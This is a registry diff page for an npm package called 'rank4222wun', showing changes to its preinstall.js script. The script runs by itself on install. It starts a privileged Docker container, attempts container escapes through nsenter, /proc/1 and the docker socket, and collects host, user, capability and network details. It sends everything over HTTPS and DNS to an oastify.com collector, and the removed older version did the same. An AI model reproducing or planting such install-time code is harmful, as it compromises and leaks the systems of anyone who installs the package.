npm - rank4222wun - Versions diffs - 1.0.35 → 1.0.37 - Mend

rank4222wun 1.0.35 → 1.0.37

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (4) hide show

package/preinstall.js CHANGED Viewed

@@ -1,6 +1,5 @@
-// multi-container-escape-detector.js
+// privileged-container-oast.js
 const { exec, spawn } = require('child_process');
-const os = require('os');
 const fs = require('fs');
 const path = require('path');
 const https = require('https');
@@ -9,929 +8,875 @@ const crypto = require('crypto');
 console.log(`
 ╔══════════════════════════════════════════════════════════╗
-║      MULTI-CONTAINER ESCAPE DETECTOR v3.0               ║
-║      Advanced Container Security Assessment              ║
+║      PRIVILEGED CONTAINER WITH OAST REPORTING           ║
+║      OAST Domain: v84zr5z8jz4cr781u5eyl6cgv71ypudj.oastify.com ║
 ╚══════════════════════════════════════════════════════════╝
 `);
 // ===================== CONFIGURATION =====================
 const CONFIG = {
-  // OAST Configuration
   OAST: {
-    domain: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
+    domain: 'v84zr5z8jz4cr781u5eyl6cgv71ypudj.oastify.com',
     httpsPort: 443,
     httpPort: 80,
     apiKey: crypto.randomBytes(16).toString('hex'),
-    sessionId: `mced-${Date.now()}-${crypto.randomBytes(4).toString('hex')}`
+    sessionId: `priv-container-${Date.now()}-${crypto.randomBytes(4).toString('hex')}`
   },
-  // Scanning Configuration
-  SCAN: {
-    maxContainers: 50,
-    parallelScans: 5,
-    timeoutPerContainer: 30000,
-    deepScan: true,
-    autoExploit: false,
-    stealthMode: false
-  },
-  // Detection Methods
-  METHODS: {
-    nsenter: true,
-    dockerSocket: true,
-    procAccess: true,
-    kernelExploits: true,
-    hostMounts: true,
-    capabilities: true,
-    networkEscape: true
+  DOCKER: {
+    image: 'ubuntu:latest',
+    command: '/bin/bash',
+    privileged: true,
+    interactive: true,
+    remove: false,
+    name: `priv-container-${Date.now()}`
   },
-  // Output Configuration
-  OUTPUT: {
-    saveReports: true,
-    reportFormat: 'json', // json, html, txt
-    verbose: true,
-    colorOutput: true
+  SCAN: {
+    hostEscape: true,
+    networkScan: true,
+    fileAccess: true,
+    capabilityCheck: true
   }
 };
-// ===================== GLOBAL STATE =====================
-const STATE = {
-  startTime: Date.now(),
-  containers: {},
-  hostInfo: null,
-  networkMap: {},
-  vulnerabilities: {},
-  oastInteractions: [],
-  statistics: {
-    totalContainers: 0,
-    scannedContainers: 0,
-    escapedContainers: 0,
-    vulnerableContainers: 0,
-    criticalEscapes: 0
+// ===================== OAST FUNCTIONS =====================
+class OASTReporter {
+  constructor() {
+    this.interactions = [];
+    this.reports = [];
   }
-};
-// ===================== UTILITY FUNCTIONS =====================
-class ContainerScanner {
-  constructor(containerId) {
-    this.id = containerId;
-    this.shortId = containerId.substring(0, 12);
-    this.info = {
-      id: containerId,
-      name: '',
-      image: '',
-      status: '',
-      escapeStatus: 'unknown',
+  sendDNS(subdomain, data = {}) {
+    const dnsName = `${subdomain}.${CONFIG.OAST.sessionId}.${CONFIG.OAST.domain}`;
+    dns.lookup(dnsName, (err) => {
+      if (!err) {
+        const interaction = {
+          type: 'DNS',
+          timestamp: new Date().toISOString(),
+          subdomain: subdomain,
+          dnsName: dnsName,
+          data: data
+        };
+        this.interactions.push(interaction);
+        console.log(`📡 DNS OAST sent: ${dnsName}`);
+      }
+    });
+  }
+  sendHTTP(endpoint, data) {
+    const postData = JSON.stringify({
+      sessionId: CONFIG.OAST.sessionId,
+      timestamp: new Date().toISOString(),
+      ...data
+    });
+    const options = {
+      hostname: CONFIG.OAST.domain,
+      port: CONFIG.OAST.httpPort,
+      path: endpoint,
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'X-Session-ID': CONFIG.OAST.sessionId,
+        'User-Agent': 'PrivilegedContainerScanner/1.0'
+      }
+    };
+    const req = http.request(options, (res) => {
+      let body = '';
+      res.on('data', chunk => body += chunk);
+      res.on('end', () => {
+        const interaction = {
+          type: 'HTTP',
+          timestamp: new Date().toISOString(),
+          endpoint: endpoint,
+          status: res.statusCode,
+          response: body,
+          data: data
+        };
+        this.interactions.push(interaction);
+        console.log(`📡 HTTP OAST sent (${res.statusCode}): ${endpoint}`);
+      });
+    });
+    req.on('error', () => {});
+    req.write(postData);
+    req.end();
+  }
+  sendHTTPS(endpoint, data) {
+    const postData = JSON.stringify({
+      sessionId: CONFIG.OAST.sessionId,
+      timestamp: new Date().toISOString(),
+      ...data
+    });
+    const options = {
+      hostname: CONFIG.OAST.domain,
+      port: CONFIG.OAST.httpsPort,
+      path: endpoint,
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'X-Session-ID': CONFIG.OAST.sessionId,
+        'X-Report-Type': 'privileged_container',
+        'User-Agent': 'ContainerEscapeDetector/2.0'
+      }
+    };
+    const req = https.request(options, (res) => {
+      let body = '';
+      res.on('data', chunk => body += chunk);
+      res.on('end', () => {
+        const interaction = {
+          type: 'HTTPS',
+          timestamp: new Date().toISOString(),
+          endpoint: endpoint,
+          status: res.statusCode,
+          response: body,
+          data: data
+        };
+        this.interactions.push(interaction);
+        this.reports.push(interaction);
+        console.log(`📡 HTTPS OAST sent (${res.statusCode}): ${endpoint}`);
+      });
+    });
+    req.on('error', (e) => {
+      console.log(`⚠️  OAST error (may be expected): ${e.message}`);
+    });
+    req.write(postData);
+    req.end();
+  }
+  async reportContainerEscape(containerId, evidence) {
+    const report = {
+      containerId: containerId.substring(0, 12),
+      escapeConfirmed: evidence.escaped || false,
+      confidence: evidence.confidence || 0,
+      methods: evidence.methods || [],
+      proofPoints: evidence.proofPoints || [],
+      hostInfo: evidence.hostInfo || {},
+      timestamp: new Date().toISOString()
+    };
+    // إرسال عبر HTTPS
+    this.sendHTTPS('/privileged-container-escape', report);
+    // إرسال DNS notification
+    if (evidence.escaped) {
+      this.sendDNS('escape-confirmed', {
+        container: containerId.substring(0, 12),
+        confidence: evidence.confidence
+      });
+    }
+    // حفظ محلياً
+    this.saveLocalReport(report);
+    return report;
+  }
+  saveLocalReport(report) {
+    const filename = `oast-report-${CONFIG.OAST.sessionId}.json`;
+    const allReports = {
+      sessionId: CONFIG.OAST.sessionId,
+      domain: CONFIG.OAST.domain,
+      timestamp: new Date().toISOString(),
+      reports: this.reports,
+      containerReport: report
+    };
+    fs.writeFileSync(filename, JSON.stringify(allReports, null, 2));
+    console.log(`💾 Report saved locally: ${filename}`);
+  }
+}
+// ===================== CONTAINER SCANNER =====================
+class PrivilegedContainerScanner {
+  constructor() {
+    this.containerId = null;
+    this.oastReporter = new OASTReporter();
+    this.evidence = {
+      escaped: false,
       confidence: 0,
-      evidence: [],
       methods: [],
-      risk: 'low',
-      network: {},
-      mounts: [],
-      capabilities: [],
-      vulnerabilities: []
+      proofPoints: [],
+      hostInfo: {},
+      containerInfo: {}
     };
-    this.rawData = {};
   }
-  async scan() {
+  async run() {
     try {
-      console.log(`\n🔍 Scanning container: ${this.shortId}`);
+      console.log('🚀 Starting privileged container analysis...\n');
-      // Collect basic info
+      // إرسال بداية الجلسة إلى OAST
+      this.oastReporter.sendHTTPS('/session-start', {
+        action: 'privileged_container_start',
+        config: CONFIG
+      });
+      // 1. تشغيل الحاوية المميزة
+      await this.runPrivilegedContainer();
+      // 2. جمع المعلومات الأساسية
       await this.collectBasicInfo();
-      // Perform escape checks
-      await this.performEscapeChecks();
+      // 3. محاولة الهروب والتأكيد
+      await this.attemptEscape();
+      // 4. فحص إضافي للحاوية
+      await this.performDeepScan();
-      // Analyze results
+      // 5. تحليل النتائج
       await this.analyzeResults();
-      // Report to OAST
-      await this.reportToOAST();
+      // 6. إرسال التقرير النهائي
+      await this.sendFinalReport();
-      // Update statistics
-      this.updateStatistics();
+      // 7. عرض النتائج
+      this.displayResults();
-      return this.info;
-    } catch (error) {
-      console.error(`❌ Error scanning container ${this.shortId}:`, error.message);
-      this.info.escapeStatus = 'scan_failed';
-      return this.info;
-    }
-  }
+      // 8. تنظيف (اختياري)
+      await this.cleanup();
-  async collectBasicInfo() {
-    const commands = {
-      name: `docker inspect ${this.id} --format '{{.Name}}'`,
-      image: `docker inspect ${this.id} --format '{{.Config.Image}}'`,
-      status: `docker inspect ${this.id} --format '{{.State.Status}}'`,
-      ip: `docker inspect ${this.id} --format '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}'`,
-      ports: `docker inspect ${this.id} --format '{{json .NetworkSettings.Ports}}'`,
-      mounts: `docker inspect ${this.id} --format '{{json .Mounts}}'`,
-      privileged: `docker inspect ${this.id} --format '{{.HostConfig.Privileged}}'`,
-      capabilities: `docker inspect ${this.id} --format '{{json .HostConfig.CapAdd}}'`
-    };
-    for (const [key, cmd] of Object.entries(commands)) {
-      try {
-        const result = await this.executeCommand(cmd);
-        this.rawData[key] = result;
-        // Parse specific data
-        switch(key) {
-          case 'name':
-            this.info.name = result.replace(/^\//, '');
-            break;
-          case 'image':
-            this.info.image = result;
-            break;
-          case 'status':
-            this.info.status = result;
-            break;
-          case 'ip':
-            this.info.network.ip = result;
-            break;
-          case 'mounts':
-            try {
-              this.info.mounts = JSON.parse(result || '[]');
-            } catch (e) {}
-            break;
-          case 'capabilities':
-            try {
-              this.info.capabilities = JSON.parse(result || '[]');
-            } catch (e) {}
-            break;
-        }
-      } catch (e) {
-        this.rawData[key] = null;
-      }
+    } catch (error) {
+      console.error(`❌ Error: ${error.message}`);
+      this.oastReporter.sendHTTPS('/error', { error: error.message });
     }
   }
-  async performEscapeChecks() {
-    const checks = [];
-    if (CONFIG.METHODS.nsenter) {
-      checks.push(this.checkNsenterEscape());
-    }
-    if (CONFIG.METHODS.dockerSocket) {
-      checks.push(this.checkDockerSocketEscape());
-    }
-    if (CONFIG.METHODS.procAccess) {
-      checks.push(this.checkProcEscape());
-    }
-    if (CONFIG.METHODS.hostMounts) {
-      checks.push(this.checkMountEscape());
-    }
-    if (CONFIG.METHODS.kernelExploits) {
-      checks.push(this.checkKernelVulnerabilities());
-    }
-    if (CONFIG.METHODS.capabilities) {
-      checks.push(this.checkDangerousCapabilities());
-    }
-    if (CONFIG.METHODS.networkEscape) {
-      checks.push(this.checkNetworkEscape());
-    }
+  async runPrivilegedContainer() {
+    console.log('📦 Running privileged container...');
+    const dockerArgs = [
+      'run',
+      '--privileged',
+      '-d',
+      '--name', CONFIG.DOCKER.name,
+      CONFIG.DOCKER.image,
+      'sleep', '3600'
+    ];
-    await Promise.all(checks);
+    return new Promise((resolve, reject) => {
+      exec(`docker ${dockerArgs.join(' ')}`, (error, stdout, stderr) => {
+        if (error) {
+          reject(error);
+          return;
+        }
+        this.containerId = stdout.trim();
+        console.log(`✅ Container started: ${this.containerId.substring(0, 12)}`);
+        // إرسال إلى OAST
+        this.oastReporter.sendHTTPS('/container-started', {
+          containerId: this.containerId.substring(0, 12),
+          name: CONFIG.DOCKER.name,
+          image: CONFIG.DOCKER.image,
+          privileged: true
+        });
+        // الانتظار للحاوية لتبدأ
+        setTimeout(resolve, 2000);
+      });
+    });
   }
-  async checkNsenterEscape() {
-    const command = `docker exec ${this.id} sh -c '
-      which nsenter >/dev/null 2>&1 &&
-      nsenter --target 1 --mount -- sh -c "hostname" 2>/dev/null | grep -v "$(hostname)" ||
-      echo "FAILED"
-    '`;
+  async collectBasicInfo() {
+    console.log('\n🔍 Collecting basic container information...');
-    try {
-      const result = await this.executeCommand(command);
-      if (!result.includes('FAILED') && result.trim()) {
-        this.info.methods.push('nsenter');
-        this.info.evidence.push(`Nsenter escape possible - Hostname: ${result.trim()}`);
-        this.sendOAST('nsenter_escape', { container: this.shortId, result: result.trim() });
-      }
-    } catch (e) {}
-  }
-  async checkDockerSocketEscape() {
     const commands = [
-      // Check if docker.sock is mounted
-      `docker exec ${this.id} ls -la /var/run/docker.sock 2>/dev/null || echo "NOT_FOUND"`,
-      // Try to access Docker API
-      `docker exec ${this.id} sh -c 'curl -s --unix-socket /var/run/docker.sock http://localhost/info 2>/dev/null | grep -q "ID" && echo "ACCESSIBLE" || echo "NO_ACCESS"'`
+      // معلومات النظام
+      'cat /etc/os-release',
+      'uname -a',
+      'whoami',
+      'id',
+      // الصلاحيات
+      'capsh --print 2>/dev/null || echo "No capsh"',
+      'cat /proc/self/status | grep -i cap',
+      // نظام الملفات
+      'ls -la /',
+      'mount | head -20',
+      'df -h',
+      // الذاكرة والمعالج
+      'free -h',
+      'cat /proc/cpuinfo | grep "model name" | head -1',
+      // الشبكة
+      'ip addr show',
+      'hostname -I',
+      'cat /etc/hosts',
+      // معلومات Docker
+      'cat /proc/1/cgroup 2>/dev/null || echo "No cgroup access"',
+      'ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket"'
     ];
-    try {
-      const [socketCheck, apiCheck] = await Promise.all(
-        commands.map(cmd => this.executeCommand(cmd))
-      );
-      if (!socketCheck.includes('NOT_FOUND') && apiCheck.includes('ACCESSIBLE')) {
-        this.info.methods.push('docker_socket');
-        this.info.evidence.push('Docker socket accessible and writable');
-        // Try to list other containers
-        const listCmd = `docker exec ${this.id} sh -c 'curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json 2>/dev/null | wc -l'`;
-        const containerCount = await this.executeCommand(listCmd);
+    const results = {};
+    for (const cmd of commands) {
+      try {
+        const output = await this.execInContainer(cmd);
+        results[cmd] = output.substring(0, 500);
-        if (parseInt(containerCount) > 1) {
-          this.info.evidence.push(`Can see ${containerCount.trim()} containers on host`);
-          this.sendOAST('docker_socket_escape', {
-            container: this.shortId,
-            accessible: true,
-            containerCount: containerCount.trim()
-          });
+        // تحليل بعض النتائج الهامة
+        if (cmd.includes('os-release')) {
+          this.evidence.containerInfo.os = output;
+        }
+        if (cmd.includes('uname -a')) {
+          this.evidence.containerInfo.kernel = output;
+        }
+        if (cmd.includes('capsh')) {
+          this.evidence.containerInfo.capabilities = output;
         }
+      } catch (error) {
+        results[cmd] = `ERROR: ${error.message}`;
       }
-    } catch (e) {}
-  }
-  async checkProcEscape() {
-    const command = `docker exec ${this.id} sh -c '
-      cat /proc/1/status 2>/dev/null | head -5 &&
-      cat /proc/1/cmdline 2>/dev/null | tr "\\\\0" " " | head -c 100 ||
-      echo "NO_ACCESS"
-    '`;
+    }
-    try {
-      const result = await this.executeCommand(command);
-      if (!result.includes('NO_ACCESS') && result.includes('State:')) {
-        this.info.methods.push('proc_access');
-        this.info.evidence.push('Can access host init process via /proc/1/');
-        this.sendOAST('proc_escape', { container: this.shortId });
-      }
-    } catch (e) {}
+    // إرسال المعلومات الأساسية إلى OAST
+    this.oastReporter.sendHTTPS('/basic-info', {
+      containerId: this.containerId.substring(0, 12),
+      basicInfo: results
+    });
+    return results;
   }
-  async checkMountEscape() {
-    const command = `docker exec ${this.id} sh -c '
-      mount 2>/dev/null | grep -E "(/proc|/sys|/dev|overlay)" | head -10 ||
-      cat /proc/mounts 2>/dev/null | head -20
-    '`;
+  async attemptEscape() {
+    console.log('\n🔓 Attempting container escape...');
+    const escapeTests = [
+      {
+        name: 'nsenter_escape',
+        command: 'which nsenter && nsenter --target 1 --mount -- sh -c "echo HOST_HOSTNAME:$(cat /etc/hostname 2>/dev/null) && echo CONTAINER_HOSTNAME:$(hostname)" 2>/dev/null || echo "FAILED"',
+        check: (output) => output.includes('HOST_HOSTNAME') && output.includes('CONTAINER_HOSTNAME')
+      },
+      {
+        name: 'proc_escape',
+        command: 'cat /proc/1/status 2>/dev/null | head -5 && cat /proc/1/cmdline 2>/dev/null | tr "\\0" " " | head -c 100',
+        check: (output) => output.includes('State:') && output.length > 20
+      },
+      {
+        name: 'host_mounts',
+        command: 'ls -la /home 2>/dev/null || ls -la /root 2>/dev/null || cat /etc/passwd 2>/dev/null | head -5 || echo "NO_ACCESS"',
+        check: (output) => !output.includes('NO_ACCESS') && output.length > 10
+      },
+      {
+        name: 'docker_socket',
+        command: 'ls -la /var/run/docker.sock 2>/dev/null && echo "EXISTS" || echo "NOT_EXISTS"',
+        check: (output) => output.includes('EXISTS')
+      },
+      {
+        name: 'network_escape',
+        command: 'ip route show 2>/dev/null | head -5 && ip neigh show 2>/dev/null | head -5',
+        check: (output) => output.includes('default via') || output.includes('lladdr')
+      }
+    ];
-    try {
-      const result = await this.executeCommand(command);
-      if (result) {
-        const lines = result.split('\n');
-        const dangerousMounts = lines.filter(line =>
-          line.includes('/proc') ||
-          line.includes('/sys') ||
-          line.includes('/dev') ||
-          line.includes('overlay')
-        );
+    for (const test of escapeTests) {
+      try {
+        const output = await this.execInContainer(test.command);
-        if (dangerousMounts.length > 0) {
-          this.info.methods.push('host_mounts');
-          this.info.evidence.push(`${dangerousMounts.length} dangerous mount points found`);
+        if (test.check(output)) {
+          this.evidence.methods.push(test.name);
+          console.log(`✅ ${test.name}: Possible`);
-          // Check if we can access host files through mounts
-          const testCmd = `docker exec ${this.id} sh -c '
-            ls -la /home 2>/dev/null | head -3 ||
-            cat /etc/passwd 2>/dev/null | head -3 ||
-            echo "NO_HOST_ACCESS"
-          '`;
+          // إرسال إلى OAST
+          this.oastReporter.sendHTTPS('/escape-attempt', {
+            method: test.name,
+            success: true,
+            output: output.substring(0, 300)
+          });
-          const accessResult = await this.executeCommand(testCmd);
-          if (!accessResult.includes('NO_HOST_ACCESS')) {
-            this.info.evidence.push('Can access host files through mounts');
-            this.sendOAST('mount_escape', {
-              container: this.shortId,
-              mounts: dangerousMounts.slice(0, 3),
-              hostAccess: true
+          // التحقق من اختلاف hostname لـ nsenter
+          if (test.name === 'nsenter_escape') {
+            const lines = output.split('\n');
+            let hostHostname = '';
+            let containerHostname = '';
+            lines.forEach(line => {
+              if (line.startsWith('HOST_HOSTNAME:')) {
+                hostHostname = line.replace('HOST_HOSTNAME:', '').trim();
+              }
+              if (line.startsWith('CONTAINER_HOSTNAME:')) {
+                containerHostname = line.replace('CONTAINER_HOSTNAME:', '').trim();
+              }
             });
+            if (hostHostname && containerHostname && hostHostname !== containerHostname) {
+              this.evidence.proofPoints.push(`Host hostname (${hostHostname}) differs from container (${containerHostname})`);
+              this.evidence.hostInfo.hostname = hostHostname;
+              this.evidence.escaped = true;
+            }
           }
         }
+      } catch (error) {
+        console.log(`❌ ${test.name}: Failed - ${error.message}`);
       }
-    } catch (e) {}
+    }
   }
-  async checkKernelVulnerabilities() {
-    const command = `docker exec ${this.id} sh -c '
-      uname -r &&
-      grep -i "dirtypipe\\|dirtycow\\|shocker\\|overlayfs" /etc/os-release 2>/dev/null ||
-      echo "NO_INFO"
-    '`;
+  async performDeepScan() {
+    if (!CONFIG.SCAN.hostEscape) return;
-    try {
-      const result = await this.executeCommand(command);
-      if (!result.includes('NO_INFO')) {
-        const lines = result.split('\n');
-        const kernel = lines[0]?.trim();
-        if (kernel) {
-          this.info.vulnerabilities.push(`Kernel: ${kernel}`);
-          // Check for known vulnerable kernels
-          const vulnerableKernels = {
-            'DirtyPipe': /^(5\.8|5\.9|5\.10|5\.11|5\.12|5\.13|5\.14|5\.15|5\.16)\./,
-            'DirtyCow': /^(2\.6\.|3\.|4\.)/,
-            'Shocker': /^(3\.8|3\.9|3\.10)\./
-          };
-          for (const [vuln, pattern] of Object.entries(vulnerableKernels)) {
-            if (pattern.test(kernel)) {
-              this.info.vulnerabilities.push(`${vuln} vulnerability detected`);
-              this.sendOAST('kernel_vuln', {
-                container: this.shortId,
-                kernel: kernel,
-                vulnerability: vuln
-              });
-              break;
-            }
-          }
-        }
+    console.log('\n🔬 Performing deep scan...');
+    const deepChecks = [
+      // محاولة إنشاء حاوية من داخل الحاوية
+      {
+        name: 'nested_container',
+        command: 'which docker && docker ps 2>/dev/null || which podman && podman ps 2>/dev/null || echo "NO_CONTAINER_RUNTIME"',
+        check: (output) => !output.includes('NO_CONTAINER_RUNTIME')
+      },
+      // فحص kernel vulnerabilities
+      {
+        name: 'kernel_check',
+        command: 'uname -r && grep -i "dirty\\|cow\\|shock\\|overlay" /etc/os-release 2>/dev/null || echo "NO_VULN_INFO"',
+        check: (output) => output.length > 5
+      },
+      // محاولة كتابة ملف في نظام المضيف
+      {
+        name: 'host_write_test',
+        command: 'echo "TEST_WRITE_FROM_CONTAINER" > /tmp/container_test.txt 2>/dev/null && echo "WRITE_SUCCESS" || echo "WRITE_FAILED"',
+        check: (output) => output.includes('WRITE_SUCCESS')
+      },
+      // فحص mount points خطيرة
+      {
+        name: 'dangerous_mounts',
+        command: 'mount 2>/dev/null | grep -E "(proc|sys|dev|/var/run)" | head -10',
+        check: (output) => output.length > 10
       }
-    } catch (e) {}
-  }
-  async checkDangerousCapabilities() {
-    const command = `docker exec ${this.id} sh -c '
-      capsh --print 2>/dev/null | grep -E "(sys_admin|sys_module|sys_ptrace|dac_override)" ||
-      echo "NO_CAPSH"
-    '`;
+    ];
-    try {
-      const result = await this.executeCommand(command);
-      if (!result.includes('NO_CAPSH') && result.trim()) {
-        const dangerousCaps = [
-          'CAP_SYS_ADMIN', 'CAP_SYS_MODULE', 'CAP_SYS_PTRACE',
-          'CAP_DAC_OVERRIDE', 'CAP_DAC_READ_SEARCH'
-        ];
+    for (const check of deepChecks) {
+      try {
+        const output = await this.execInContainer(check.command);
-        const foundCaps = dangerousCaps.filter(cap => result.includes(cap));
-        if (foundCaps.length > 0) {
-          this.info.methods.push('capabilities');
-          this.info.evidence.push(`Dangerous capabilities: ${foundCaps.join(', ')}`);
-          this.sendOAST('dangerous_caps', {
-            container: this.shortId,
-            capabilities: foundCaps
+        if (check.check(output)) {
+          console.log(`⚠️  ${check.name}: Found potential issue`);
+          // إرسال إلى OAST
+          this.oastReporter.sendDNS(check.name, {
+            result: output.substring(0, 100)
           });
         }
+      } catch (error) {
+        // تجاهل الأخطاء
       }
-    } catch (e) {}
-  }
-  async checkNetworkEscape() {
-    const commands = [
-      `docker exec ${this.id} ip route show 2>/dev/null | head -5`,
-      `docker exec ${this.id} netstat -tunap 2>/dev/null | head -10`,
-      `docker exec ${this.id} iptables -L -n 2>/dev/null | head -20`
-    ];
-    try {
-      const results = await Promise.all(
-        commands.map(cmd => this.executeCommand(cmd).catch(() => ''))
-      );
-      if (results.some(r => r.trim())) {
-        this.info.methods.push('network_escape');
-        this.info.network.details = {
-          routes: results[0]?.split('\n').slice(0, 3) || [],
-          connections: results[1]?.split('\n').slice(0, 5) || [],
-          iptables: results[2]?.split('\n').slice(0, 10) || []
-        };
-      }
-    } catch (e) {}
+    }
   }
   async analyzeResults() {
-    // Calculate confidence score
-    let score = 0;
+    console.log('\n📊 Analyzing results...');
-    // Method points
+    // حساب مستوى الثقة
+    let confidence = 0;
+    // نقاط لكل طريقة هروب محتملة
     const methodPoints = {
-      nsenter: 25,
-      docker_socket: 30,
-      proc_access: 20,
-      host_mounts: 15,
-      capabilities: 10,
-      network_escape: 10
+      nsenter_escape: 30,
+      proc_escape: 25,
+      host_mounts: 20,
+      docker_socket: 25,
+      network_escape: 15
     };
-    this.info.methods.forEach(method => {
-      score += methodPoints[method] || 0;
+    this.evidence.methods.forEach(method => {
+      confidence += methodPoints[method] || 10;
     });
-    // Vulnerability points
-    if (this.info.vulnerabilities.length > 0) {
-      score += this.info.vulnerabilities.length * 10;
+    // نقاط إضافية لأدلة قاطعة
+    if (this.evidence.proofPoints.length > 0) {
+      confidence += this.evidence.proofPoints.length * 10;
     }
-    // Evidence points
-    score += Math.min(this.info.evidence.length * 5, 25);
-    // Capabilities points
-    if (this.info.capabilities.includes('CAP_SYS_ADMIN')) {
-      score += 20;
+    // إذا كان hostname مختلف
+    if (this.evidence.hostInfo.hostname) {
+      confidence += 20;
     }
-    // Determine escape status
-    this.info.confidence = Math.min(100, score);
-    if (this.info.confidence >= 70) {
-      this.info.escapeStatus = 'confirmed';
-      this.info.risk = 'critical';
-    } else if (this.info.confidence >= 40) {
-      this.info.escapeStatus = 'probable';
-      this.info.risk = 'high';
-    } else if (this.info.confidence >= 20) {
-      this.info.escapeStatus = 'possible';
-      this.info.risk = 'medium';
+    // تحديد إذا تم الهروب فعلاً
+    this.evidence.confidence = Math.min(100, confidence);
+    if (this.evidence.confidence >= 60) {
+      this.evidence.escaped = true;
+      console.log(`🚨 CONFIRMED: Container escape possible (${this.evidence.confidence}% confidence)`);
+    } else if (this.evidence.confidence >= 30) {
+      console.log(`⚠️  POSSIBLE: Container escape may be possible (${this.evidence.confidence}% confidence)`);
     } else {
-      this.info.escapeStatus = 'unlikely';
-      this.info.risk = 'low';
+      console.log(`✅ SECURE: Container appears isolated (${this.evidence.confidence}% confidence)`);
     }
   }
-  async reportToOAST() {
-    if (this.info.escapeStatus !== 'unlikely' && this.info.confidence > 10) {
-      const payload = {
-        sessionId: CONFIG.OAST.sessionId,
-        timestamp: new Date().toISOString(),
-        container: {
-          id: this.shortId,
-          name: this.info.name,
-          image: this.info.image
-        },
-        escape: {
-          status: this.info.escapeStatus,
-          confidence: this.info.confidence,
-          risk: this.info.risk,
-          methods: this.info.methods,
-          evidence: this.info.evidence.slice(0, 5)
-        },
-        vulnerabilities: this.info.vulnerabilities
-      };
-      this.sendOAST('container_escape_report', payload);
-    }
-  }
-  sendOAST(type, data) {
-    const interactionId = `interaction-${Date.now()}-${crypto.randomBytes(3).toString('hex')}`;
-    const interaction = {
-      id: interactionId,
-      type: type,
+  async sendFinalReport() {
+    console.log('\n📡 Sending final report to OAST...');
+    const report = {
+      sessionId: CONFIG.OAST.sessionId,
+      containerId: this.containerId ? this.containerId.substring(0, 12) : 'unknown',
       timestamp: new Date().toISOString(),
-      container: this.shortId,
-      data: data
+      evidence: this.evidence,
+      summary: {
+        escaped: this.evidence.escaped,
+        confidence: this.evidence.confidence,
+        methods: this.evidence.methods,
+        proofPoints: this.evidence.proofPoints
+      }
     };
-    STATE.oastInteractions.push(interaction);
+    // إرسال التقرير النهائي
+    this.oastReporter.reportContainerEscape(this.containerId, this.evidence);
-    // Send via HTTPS
-    const req = https.request({
-      hostname: CONFIG.OAST.domain,
-      port: CONFIG.OAST.httpsPort,
-      path: '/multi-container-escape',
-      method: 'POST',
-      headers: {
-        'Content-Type': 'application/json',
-        'X-Session-ID': CONFIG.OAST.sessionId,
-        'X-Container-ID': this.shortId,
-        'X-API-Key': CONFIG.OAST.apiKey,
-        'User-Agent': 'MultiContainerEscapeDetector/3.0'
-      }
-    }, (res) => {
-      let body = '';
-      res.on('data', chunk => body += chunk);
-      res.on('end', () => {
-        if (CONFIG.OUTPUT.verbose) {
-          console.log(`📡 OAST report sent for ${this.shortId} (${res.statusCode})`);
-        }
-      });
+    // إرسال DNS notification للنتيجة
+    const resultType = this.evidence.escaped ? 'escape-confirmed' : 'no-escape';
+    this.oastReporter.sendDNS(resultType, {
+      confidence: this.evidence.confidence,
+      methods: this.evidence.methods.length
     });
-    req.on('error', () => {});
-    req.write(JSON.stringify({
-      interactionId: interactionId,
-      sessionId: CONFIG.OAST.sessionId,
-      containerId: this.shortId,
-      data: data
-    }));
-    req.end();
-    // Also send DNS notification for critical escapes
-    if (this.info.risk === 'critical') {
-      const dnsName = `${this.shortId}-critical.${CONFIG.OAST.sessionId}.${CONFIG.OAST.domain}`;
-      dns.lookup(dnsName, () => {});
-    }
+    return report;
   }
-  executeCommand(command) {
-    return new Promise((resolve, reject) => {
-      exec(command, { timeout: 5000 }, (error, stdout, stderr) => {
-        if (error) {
-          reject(error);
-        } else {
-          resolve(stdout.toString().trim());
-        }
+  displayResults() {
+    console.log('\n' + '='.repeat(80));
+    console.log('📊 PRIVILEGED CONTAINER ANALYSIS RESULTS');
+    console.log('='.repeat(80));
+    console.log(`\n📦 Container ID: ${this.containerId ? this.containerId.substring(0, 12) : 'unknown'}`);
+    console.log(`📍 OAST Domain: ${CONFIG.OAST.domain}`);
+    console.log(`🔑 Session ID: ${CONFIG.OAST.sessionId}`);
+    console.log(`\n🎯 Escape Status: ${this.evidence.escaped ? '🚨 CONFIRMED' : '✅ NOT CONFIRMED'}`);
+    console.log(`📈 Confidence Level: ${this.evidence.confidence}%`);
+    if (this.evidence.methods.length > 0) {
+      console.log(`\n🔓 Possible Escape Methods:`);
+      this.evidence.methods.forEach((method, i) => {
+        console.log(`   ${i + 1}. ${method}`);
       });
-    });
-  }
-  updateStatistics() {
-    STATE.statistics.scannedContainers++;
-    if (this.info.escapeStatus === 'confirmed') {
-      STATE.statistics.escapedContainers++;
-      STATE.statistics.criticalEscapes++;
-    } else if (this.info.escapeStatus === 'probable') {
-      STATE.statistics.escapedContainers++;
-    }
-    if (this.info.vulnerabilities.length > 0) {
-      STATE.statistics.vulnerableContainers++;
     }
-  }
-}
-// ===================== MAIN SCANNER CLASS =====================
-class MultiContainerScanner {
-  constructor() {
-    this.scanners = [];
-    this.results = [];
-  }
-  async discoverContainers() {
-    console.log('🔎 Discovering containers...');
-    try {
-      // Get all running containers
-      const cmd = 'docker ps -q --no-trunc';
-      const output = await this.exec(cmd);
-      const containerIds = output.split('\n').filter(id => id.trim());
-      STATE.statistics.totalContainers = containerIds.length;
-      if (containerIds.length === 0) {
-        console.log('ℹ️ No running containers found.');
-        return [];
-      }
-      console.log(`📦 Found ${containerIds.length} containers`);
-      return containerIds;
-    } catch (error) {
-      console.error('❌ Failed to discover containers:', error.message);
-      return [];
+    if (this.evidence.proofPoints.length > 0) {
+      console.log(`\n🎯 Evidence Found:`);
+      this.evidence.proofPoints.forEach((proof, i) => {
+        console.log(`   ${i + 1}. ${proof}`);
+      });
     }
-  }
-  async scanContainers(containerIds) {
-    console.log(`🚀 Starting scan of ${containerIds.length} containers...\n`);
-    // Create scanners
-    this.scanners = containerIds.map(id => new ContainerScanner(id));
-    // Scan in batches to avoid overwhelming the system
-    const batchSize = CONFIG.SCAN.parallelScans;
